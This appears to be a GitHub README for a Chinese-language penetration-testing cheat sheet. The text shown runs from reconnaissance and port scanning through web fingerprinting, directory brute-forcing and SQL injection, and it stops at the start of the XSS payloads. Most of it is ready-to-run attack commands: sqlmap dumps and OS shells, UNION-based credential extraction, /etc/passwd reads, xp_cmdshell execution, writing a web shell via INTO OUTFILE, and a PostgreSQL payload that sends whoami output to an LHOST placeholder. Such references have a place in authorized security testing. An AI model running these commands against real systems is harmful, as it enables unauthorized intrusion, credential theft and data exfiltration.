PentesterTN/CopyHack

GitHub: PentesterTN/CopyHack

一份包含 500 余条渗透测试常用单行命令的速查手册，覆盖 27 个攻击场景，便于快速复制执行。

Stars: 0 | Forks: 0

CopyHack

500+ 条适用于各种黑客场景的渗透测试单行命令
别再谷歌了。开始黑客吧。

Recon • SQLi • XSS • LFI • RCE • SSRF • PrivEsc • AD • Cloud • Containers • Shells • Cracking

## 如何使用你正在进行渗透测试。你拿到了一个 shell。你需要一条命令。**现在就要**。 1. 在下方找到你的章节 2. 复制命令 3. 将 `TARGET`、`LHOST`、`LPORT` 替换为你的值 4. 执行或者从终端搜索： ``` curl -s https://raw.githubusercontent.com/PentesterTN/CopyHack/main/README.md | grep -A2 "your_keyword" ``` ## 目录 | # | 章节 | 命令数 | |---|---------|----------| | 01 | [侦察 (Reconnaissance)](#01-reconnaissance) | 60+ | | 02 | [子域名枚举 (Subdomain Enumeration)](#02-subdomain-enumeration) | 30+ | | 03 | [端口扫描 (Port Scanning)](#03-port-scanning) | 25+ | | 04 | [Web 指纹识别 (Web Fingerprinting)](#04-web-fingerprinting) | 30+ | | 05 | [目录与文件发现 (Directory & File Discovery)](#05-directory--file-discovery) | 30+ | | 06 | [SQL 注入 (SQL Injection)](#06-sql-injection) | 50+ | | 07 | [跨站脚本攻击 (Cross-Site Scripting (XSS))](#07-cross-site-scripting-xss) | 50+ | | 08 | [本地/远程文件包含 (Local/Remote File Inclusion)](#08-localremote-file-inclusion) | 40+ | | 09 | [命令注入 (Command Injection)](#09-command-injection) | 30+ | | 10 | [SSRF](#10-ssrf) | 30+ | | 11 | [认证绕过 (Authentication Bypass)](#11-authentication-bypass) | 30+ | | 12 | [IDOR 与访问控制 (IDOR & Access Control)](#12-idor--access-control) | 25+ | | 13 | [API 测试 (API Testing)](#13-api-testing) | 40+ | | 14 | [反向 Shell (Reverse Shells)](#14-reverse-shells) | 50+ | | 15 | [文件传输 (File Transfer)](#15-file-transfer) | 30+ | | 16 | [Linux 提权 (Linux Privilege Escalation)](#16-linux-privilege-escalation) | 80+ | | 17 | [Windows 提权 (Windows Privilege Escalation)](#17-windows-privilege-escalation) | 70+ | | 18 | [Active Directory](#18-active-directory) | 60+ | | 19 | [横向移动与隧道 (Lateral Movement & Pivoting)](#19-lateral-movement--pivoting) | 40+ | | 20 | [云环境 (AWS/GCP/Azure) (Cloud)](#20-cloud-awsgcpazure) | 50+ | | 21 | [容器逃逸 (Docker/K8s) (Container Escape)](#21-container-escape-dockerk8s) | 35+ | | 22 | [密码破解 (Password Cracking)](#22-password-cracking) | 30+ | | 23 | [权限维持与后门 (Persistence & Backdoors)](#23-persistence--backdoors) | 30+ | | 24 | [数据渗出 (Data Exfiltration)](#24-data-exfiltration) | 25+ | | 25 | [防御规避 (Defense Evasion)](#25-defense-evasion) | 30+ | | 26 | [无线攻击 (Wireless Attacks)](#26-wireless-attacks) | 25+ | | 27 | [OSINT](#27-osint) | 30+ | ## 01. 侦察 (Reconnaissance) ### DNS ``` # All DNS records dig TARGET ANY +noall +answer # Zone transfer attempt dig axfr @NS_SERVER TARGET # Reverse DNS lookup on a range for ip in $(seq 1 254); do host 10.10.10.$ip; done | grep -v "not found" # DNS brute force with wordlist for sub in $(cat /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt); do dig +short $sub.TARGET | grep -v "^$" && echo "$sub.TARGET"; done # Get all DNS records with multiple types for type in A AAAA CNAME MX NS TXT SOA SRV; do echo "=== $type ===" && dig $type TARGET +short; done # DNSSEC check dig TARGET +dnssec +short # Find nameservers and check for open resolvers dig NS TARGET +short | while read ns; do dig @$ns version.bind chaos txt +short 2>/dev/null && echo " -> $ns"; done # DNS cache snooping dig @NS_SERVER TARGET A +norecurse # Reverse DNS brute force for a /24 for i in $(seq 1 254); do host TARGET_NETWORK.$i | grep "name pointer" | cut -d' ' -f5; done # PTR record lookup dig -x IP_ADDRESS +short ``` ### Whois & ASN ``` # Whois lookup whois TARGET # ASN lookup whois -h whois.radb.net -- "-i origin AS_NUMBER" | grep -Eo "([0-9.]+){4}/[0-9]+" # Find all IPs belonging to an organization curl -s "https://api.bgpview.io/search?query_term=TARGET_ORG" | jq '.data.asns[].asn' # Reverse whois by email curl -s "https://viewdns.info/reversewhois/?q=TARGET_EMAIL" | grep -oP '[a-z0-9.-]+\.[a-z]{2,}' # CIDR ranges for an ASN whois -h whois.radb.net -- "-i origin ASXXXXX" | grep -Eo "([0-9.]+){4}/[0-9]+" | sort -u ``` ### 技术检测 (Technology Detection) ``` # HTTP headers fingerprinting curl -sI https://TARGET | grep -iE "server|x-powered|x-asp|x-generator|x-drupal|x-framework" # Check for common tech indicators curl -s https://TARGET | grep -ioE "(wp-content|drupal|joomla|laravel|django|angular|react|vue|next|nuxt|rails|spring|express)" # Wappalyzer-style from CLI whatweb https://TARGET # SSL/TLS certificate details echo | openssl s_client -connect TARGET:443 2>/dev/null | openssl x509 -noout -text | grep -E "Subject:|Issuer:|DNS:" # Check HTTP methods allowed curl -sI -X OPTIONS https://TARGET | grep "Allow:" # Extract JavaScript framework versions curl -s https://TARGET | grep -oP '(react|angular|vue|jquery|bootstrap)[\w.-]*\.js' | sort -u # Identify WAF wafw00f https://TARGET # Check security headers curl -sI https://TARGET | grep -iE "strict-transport|content-security|x-frame|x-content-type|x-xss|referrer-policy|permissions-policy" ``` ### 邮箱与用户 (Email & users) ``` # Email harvesting with theHarvester theHarvester -d TARGET -b all -l 500 # Extract emails from a website curl -s https://TARGET | grep -oP '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}' # LinkedIn employee enumeration (passive) curl -s "https://www.google.com/search?q=site:linkedin.com+%22TARGET%22+employees" | grep -oP 'linkedin\.com/in/[^"&]+' # Hunter.io email finder curl -s "https://api.hunter.io/v2/domain-search?domain=TARGET&api_key=API_KEY" | jq '.data.emails[].value' # Check if email exists (SMTP VRFY) echo "VRFY user@TARGET" | nc -w3 MAIL_SERVER 25 # SMTP user enumeration smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/Names/names.txt -t MAIL_SERVER # Check for email spoofing (SPF/DMARC) dig TXT TARGET | grep "v=spf" dig TXT _dmarc.TARGET | grep "v=DMARC" # Google dork for emails # site:TARGET filetype:pdf | filetype:doc | filetype:xls ``` ### Google Dorking ``` # Find login pages # site:TARGET inurl:login | inurl:admin | inurl:signin # Find sensitive files # site:TARGET filetype:sql | filetype:env | filetype:log | filetype:bak # Find exposed directories # site:TARGET intitle:"index of" | intitle:"directory listing" # Find subdomains via Google # site:*.TARGET -www # Find config files # site:TARGET ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini # Find database dumps # site:TARGET ext:sql | ext:dbf | ext:mdb # Find exposed Git repos # site:TARGET inurl:".git" # Find WordPress specific # site:TARGET inurl:wp-content | inurl:wp-includes # Find API keys in JS # site:TARGET ext:js "api_key" | "apikey" | "api-key" # Find error pages with stack traces # site:TARGET "Fatal error" | "Stack trace" | "Traceback" | "Internal Server Error" ``` ### Shodan ``` # Basic host search shodan host TARGET_IP # Search by organization shodan search "org:TARGET_ORG" # Find specific services shodan search "hostname:TARGET port:8080" # Find default creds pages shodan search "http.title:dashboard hostname:TARGET" # Export results shodan search "org:TARGET_ORG" --fields ip_str,port,org,hostnames --limit 1000 # Find exposed databases shodan search "port:27017 org:TARGET_ORG" # MongoDB shodan search "port:6379 org:TARGET_ORG" # Redis shodan search "port:9200 org:TARGET_ORG" # Elasticsearch # Find webcams shodan search "Server: yawcam org:TARGET_ORG" ``` ## 02. 子域名枚举 (Subdomain Enumeration) ``` # Subfinder subfinder -d TARGET -all -silent # Amass passive amass enum -passive -d TARGET # Assetfinder assetfinder --subs-only TARGET # Certificate transparency logs curl -s "https://crt.sh/?q=%25.TARGET&output=json" | jq -r '.[].name_value' | sort -u # SecurityTrails curl -s "https://api.securitytrails.com/v1/domain/TARGET/subdomains" -H "APIKEY: KEY" | jq -r '.subdomains[]' | sed "s/$/.TARGET/" # Brute force with DNS resolving cat /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt | while read sub; do ip=$(dig +short $sub.TARGET | head -1) [ -n "$ip" ] && echo "$sub.TARGET -> $ip" done # Combine multiple tools (subfinder -d TARGET -silent; amass enum -passive -d TARGET 2>/dev/null; assetfinder --subs-only TARGET) | sort -u # Check which subdomains are alive cat subdomains.txt | httpx -silent -status-code -title # Find subdomains from JavaScript files cat urls.txt | grep "\.js$" | xargs -I{} curl -s {} | grep -oP '[a-zA-Z0-9_-]+\.TARGET' | sort -u # Wayback machine subdomain discovery curl -s "http://web.archive.org/cdx/search/cdx?url=*.TARGET/*&output=json&fl=original" | jq -r '.[1:][] | .[0]' | sed 's|https\?://||' | cut -d'/' -f1 | sort -u # Recursive subdomain enumeration subfinder -d TARGET -silent | while read sub; do subfinder -d $sub -silent; done | sort -u # Find virtual hosts ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://TARGET_IP -H "Host: FUZZ.TARGET" -fs SIZE_TO_FILTER # GitHub subdomains curl -s "https://api.github.com/search/code?q=%22TARGET%22&per_page=100" | grep -oP '[a-z0-9_.-]+\.TARGET' | sort -u # Rapid7 FDNS dataset (if downloaded) zcat fdns_any.json.gz | grep "TARGET" | jq -r '.name' | sort -u # DNSRecon dnsrecon -d TARGET -t brt -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt # Gobuster DNS mode gobuster dns -d TARGET -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 50 # Check for subdomain takeover subjack -w subdomains.txt -t 100 -timeout 30 -ssl -a # DNSSEC walking nsec3walker TARGET # Find subdomains in SPF records dig TXT TARGET +short | grep -oP 'include:([^\s]+)' | while read inc; do echo $inc; dig TXT $(echo $inc | cut -d: -f2) +short; done ``` ## 03. 端口扫描 (Port Scanning) ``` # Fast full port scan nmap -p- --min-rate=1000 -T4 TARGET -oN ports.txt # Service version detection on found ports nmap -sV -sC -p PORTS TARGET -oN services.txt # UDP top ports nmap -sU --top-ports 50 TARGET # Masscan full port scan (fastest) masscan -p1-65535 TARGET --rate=1000 -oL masscan.txt # Rustscan (fast + nmap integration) rustscan -a TARGET -- -sV -sC # Scan through proxy/SOCKS proxychains nmap -sT -Pn -p 80,443,8080 TARGET # Scan for specific vulnerabilities nmap --script vuln TARGET # OS detection nmap -O TARGET # Scan entire subnet nmap -sn 10.10.10.0/24 -oG alive.txt && grep "Up" alive.txt | cut -d' ' -f2 # Aggressive scan nmap -A -T4 TARGET # Firewall evasion techniques nmap -f -D RND:5 -S SPOOF_IP TARGET # Fragment + decoy nmap --source-port 53 TARGET # Source port 53 (DNS) nmap -sN TARGET # NULL scan nmap -sF TARGET # FIN scan nmap -sX TARGET # Xmas scan # Banner grabbing echo "" | nc -nv TARGET PORT 2>&1 | head -5 # Quick banner grab on multiple ports for port in 21 22 25 80 110 143 443 445 3306 3389 8080; do echo -n "Port $port: " && echo "" | nc -w2 -nv TARGET $port 2>&1 | head -1 done # Scan for SMB nmap -p 139,445 --script smb-vuln* TARGET # Check for EternalBlue nmap -p 445 --script smb-vuln-ms17-010 TARGET # Network sweep with ping fping -a -g 10.10.10.0/24 2>/dev/null # ARP scan (local network) arp-scan -l # Netcat port scan for port in $(seq 1 1000); do (echo >/dev/tcp/TARGET/$port) 2>/dev/null && echo "Port $port open"; done ``` ## 04. Web 指纹识别 (Web Fingerprinting) ``` # Full header analysis curl -sILk https://TARGET # Extract all links from a page curl -s https://TARGET | grep -oP 'href="[^"]+"' | cut -d'"' -f2 | sort -u # Find JavaScript files curl -s https://TARGET | grep -oP 'src="[^"]*\.js"' | cut -d'"' -f2 | sort -u # Extract API endpoints from JavaScript curl -s https://TARGET/main.js | grep -oP '"/(api|v[0-9])/[^"]*"' | sort -u # Check robots.txt curl -s https://TARGET/robots.txt # Check sitemap.xml curl -s https://TARGET/sitemap.xml | grep -oP 'https?://[^<]+' # Extract comments from HTML curl -s https://TARGET | grep -oP '' # Check for source maps curl -s https://TARGET | grep -oP 'src="([^"]*\.js)"' | cut -d'"' -f2 | while read js; do code=$(curl -sk -o /dev/null -w "%{http_code}" "https://TARGET${js}.map") [ "$code" = "200" ] && echo "SOURCE MAP: ${js}.map" done # WordPress detection & enumeration wpscan --url https://TARGET -e ap,at,u # Extract emails from page curl -s https://TARGET | grep -oP '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-z]{2,}' # Find hidden form fields curl -s https://TARGET | grep -oP ']*type="hidden"[^>]*>' # Check for CORS misconfiguration curl -sI -H "Origin: https://evil.com" https://TARGET | grep -i "access-control" # Detect framework from cookies curl -sI https://TARGET | grep -i "set-cookie" | grep -ioE "(PHPSESSID|JSESSIONID|ASP.NET_SessionId|connect.sid|laravel_session|_rails|csrftoken|wp-settings)" # Check for clickjacking curl -sI https://TARGET | grep -i "x-frame-options" # Extract metadata from PDF/docs exiftool document.pdf # Crawl and extract URLs katana -u https://TARGET -d 3 -silent # GAU (Get All URLs from archives) gau TARGET --subs | sort -u # Wayback URLs waybackurls TARGET | sort -u # Extract parameters from URLs cat urls.txt | grep "?" | cut -d'?' -f2 | tr '&' '\n' | cut -d'=' -f1 | sort -u # Find sensitive files for file in .env .git/HEAD .svn/entries .DS_Store .htaccess wp-config.php.bak config.php.bak web.config database.yml .npmrc .dockerenv Dockerfile docker-compose.yml; do code=$(curl -sk -o /dev/null -w "%{http_code}" "https://TARGET/$file") [ "$code" = "200" ] && echo "FOUND: $file" done ``` ## 05. 目录与文件发现 (Directory & File Discovery) ``` # Feroxbuster (recursive, fast) feroxbuster -u https://TARGET -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,asp,aspx,html,txt,bak -t 50 # Gobuster gobuster dir -u https://TARGET -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt -t 50 # FFuf ffuf -u https://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -mc 200,301,302,403 -t 50 # Dirsearch dirsearch -u https://TARGET -e php,asp,aspx,html,txt,bak # Find backup files for ext in bak old orig save swp swo tmp ~; do ffuf -u https://TARGET/FUZZ.$ext -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200 -s done # API endpoint discovery ffuf -u https://TARGET/api/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -mc 200,201,401,403 # Find hidden parameters arjun -u https://TARGET/page # Recursive gobuster gobuster dir -u https://TARGET -w /usr/share/wordlists/dirb/common.txt -r -t 50 --wildcard # IIS specific gobuster dir -u https://TARGET -w /usr/share/seclists/Discovery/Web-Content/IIS.fuzz.txt -x asp,aspx,config # WordPress specific gobuster dir -u https://TARGET -w /usr/share/seclists/Discovery/Web-Content/CMS/wordpress.fuzz.txt # Find config files ffuf -u https://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt -mc 200 # Virtual host discovery ffuf -u http://TARGET -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.TARGET" -fs SIZE # 403 Bypass techniques for path in "/ENDPOINT" "/ENDPOINT/" "/ENDPOINT/." "/./ENDPOINT/./" "//ENDPOINT//" "/ENDPOINT%20" "/ENDPOINT%09" "/ENDPOINT..;/" "/ENDPOINT;/" "/ENDPOINT.json"; do code=$(curl -sk -o /dev/null -w "%{http_code}" "https://TARGET$path") echo "$code $path" done # 403 Bypass with headers for header in "X-Original-URL: /ENDPOINT" "X-Rewrite-URL: /ENDPOINT" "X-Forwarded-For: 127.0.0.1" "X-Custom-IP-Authorization: 127.0.0.1" "X-Real-IP: 127.0.0.1"; do code=$(curl -sk -o /dev/null -w "%{http_code}" -H "$header" "https://TARGET/ENDPOINT") echo "$code $header" done # HTTP method fuzzing for method in GET POST PUT DELETE PATCH OPTIONS HEAD TRACE CONNECT; do code=$(curl -sk -o /dev/null -w "%{http_code}" -X $method "https://TARGET/ENDPOINT") echo "$code $method" done # Find .git exposed and dump it git-dumper https://TARGET/.git/ output_dir # Nuclei scanning nuclei -u https://TARGET -t /usr/share/nuclei-templates/ -severity critical,high ``` ## 06. SQL 注入 (SQL Injection) ### 检测 (Detection) ``` # Basic error-based test curl -s "https://TARGET/page?id=1'" | grep -iE "sql|syntax|mysql|ora-|postgresql|sqlite|microsoft|warning" # Boolean-based detection # TRUE: https://TARGET/page?id=1 AND 1=1 # FALSE: https://TARGET/page?id=1 AND 1=2 # Compare response sizes: curl -s "https://TARGET/page?id=1 AND 1=1" | wc -c curl -s "https://TARGET/page?id=1 AND 1=2" | wc -c # Time-based detection time curl -s "https://TARGET/page?id=1; WAITFOR DELAY '0:0:5'--" # MSSQL time curl -s "https://TARGET/page?id=1' AND SLEEP(5)--" # MySQL time curl -s "https://TARGET/page?id=1'; SELECT pg_sleep(5)--" # PostgreSQL # UNION-based column count for i in $(seq 1 20); do cols=$(python3 -c "print(','.join(['NULL']*$i))") code=$(curl -sk -o /dev/null -w "%{http_code}" "https://TARGET/page?id=1' UNION SELECT $cols--") echo "Columns $i: HTTP $code" done # URL-encoded payloads curl -s "https://TARGET/page?id=1%27%20OR%201%3D1--%20" # Double URL encoding curl -s "https://TARGET/page?id=1%2527%2520OR%25201%253D1--%2520" # JSON body SQLi curl -s -X POST https://TARGET/api/login -H "Content-Type: application/json" -d '{"user":"admin'\'' OR 1=1--","pass":"x"}' # Header-based SQLi curl -s https://TARGET -H "X-Forwarded-For: 1' OR 1=1--" curl -s https://TARGET -H "User-Agent: 1' OR 1=1--" curl -s https://TARGET -H "Referer: 1' OR 1=1--" curl -s https://TARGET -b "cookie=1' OR 1=1--" ``` ### 使用 SQLmap 利用 (Exploitation with SQLmap) ``` # Basic sqlmap sqlmap -u "https://TARGET/page?id=1" --batch --dbs # POST request sqlmap -u "https://TARGET/login" --data="user=admin&pass=test" --batch --dbs # With cookies sqlmap -u "https://TARGET/page?id=1" --cookie="session=ABC123" --batch --dbs # Specific parameter sqlmap -u "https://TARGET/page?id=1&name=test" -p id --batch --dbs # Through proxy sqlmap -u "https://TARGET/page?id=1" --proxy="http://127.0.0.1:8080" --batch --dbs # Dump specific table sqlmap -u "https://TARGET/page?id=1" -D database -T users --dump --batch # OS shell sqlmap -u "https://TARGET/page?id=1" --os-shell --batch # File read sqlmap -u "https://TARGET/page?id=1" --file-read="/etc/passwd" --batch # Tamper scripts for WAF bypass sqlmap -u "https://TARGET/page?id=1" --tamper=space2comment,between,randomcase --batch --dbs # Level and risk increase sqlmap -u "https://TARGET/page?id=1" --level=5 --risk=3 --batch --dbs # Second order SQLi sqlmap -u "https://TARGET/page?id=1" --second-url="https://TARGET/result" --batch --dbs # From Burp request file sqlmap -r request.txt --batch --dbs ``` ### 手动利用 (Manual Exploitation) ``` # MySQL - Extract version curl -s "https://TARGET/page?id=1' UNION SELECT NULL,version(),NULL--" # MySQL - List databases curl -s "https://TARGET/page?id=1' UNION SELECT NULL,group_concat(schema_name),NULL FROM information_schema.schemata--" # MySQL - List tables curl -s "https://TARGET/page?id=1' UNION SELECT NULL,group_concat(table_name),NULL FROM information_schema.tables WHERE table_schema='DB_NAME'--" # MySQL - List columns curl -s "https://TARGET/page?id=1' UNION SELECT NULL,group_concat(column_name),NULL FROM information_schema.columns WHERE table_name='TABLE_NAME'--" # MySQL - Extract data curl -s "https://TARGET/page?id=1' UNION SELECT NULL,group_concat(username,0x3a,password),NULL FROM users--" # MySQL - Read file curl -s "https://TARGET/page?id=1' UNION SELECT NULL,LOAD_FILE('/etc/passwd'),NULL--" # MySQL - Write file (into outfile) curl -s "https://TARGET/page?id=1' UNION SELECT NULL,'',NULL INTO OUTFILE '/var/www/html/shell.php'--" # MSSQL - Extract version curl -s "https://TARGET/page?id=1' UNION SELECT NULL,@@version,NULL--" # MSSQL - RCE via xp_cmdshell curl -s "https://TARGET/page?id=1'; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; EXEC xp_cmdshell 'whoami'--" # PostgreSQL - Extract version curl -s "https://TARGET/page?id=1' UNION SELECT NULL,version(),NULL--" # PostgreSQL - Read file curl -s "https://TARGET/page?id=1'; COPY (SELECT '') TO PROGRAM 'curl http://LHOST/$(whoami)'--" # SQLite - List tables curl -s "https://TARGET/page?id=1' UNION SELECT NULL,group_concat(name),NULL FROM sqlite_master WHERE type='table'--" # Blind Boolean extraction (one char at a time) for i in $(seq 1 50); do for c in $(seq 32 126); do char=$(printf "\\x$(printf '%02x' $c)") resp=$(curl -s "https://TARGET/page?id=1' AND SUBSTRING(version(),$i,1)='$char'--" | wc -c) [ "$resp" -gt "BASELINE" ] && echo -n "$char" && break done done ``` ## 07. 跨站脚本攻击 (Cross-Site Scripting (XSS)) ### 检测 (Detection) ``` # Basic reflected XSS test curl -s "https://TARGET/search?q=" | grep "" # Test in all parameters # Replace PARAM with parameter name curl -s "https://TARGET/page?PARAM=xss%22%3E%3Cscript%3Ealert(1)%3C/script%3E" # POST-based XSS curl -s -X POST https://TARGET/form -d 'input=' # DOM XSS detection (look for dangerous sinks in JS) curl -s https://TARGET | grep -oP '(document\.write|innerHTML|outerHTML|eval\(|setTimeout\(|setInterval\(|location\.href|location\.assign|\.src\s*=|\.href\s*=)[^;]*' ``` ### Payload - 基础 (Payloads - Basic) ```